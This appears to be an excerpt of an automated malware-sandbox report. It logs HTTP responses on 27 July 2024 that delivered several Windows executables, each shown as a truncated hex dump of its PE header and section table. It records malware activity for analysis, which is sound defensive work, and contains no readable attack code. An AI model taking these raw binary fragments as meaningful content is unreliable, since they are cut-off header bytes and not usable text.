2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:16 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:17 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:20 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:23 GMTContent-Type: application/octet-streamContent-Length: 1955840Last-Modified: Sat, 27 Jul 2024 03:09:26 GMTConnection: keep-aliveETag: "66a464e6-1dd800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 40 4d 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 70 4d 00 00 04 00 00 b4 73 1e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 2d 4d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2c 2d 4d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 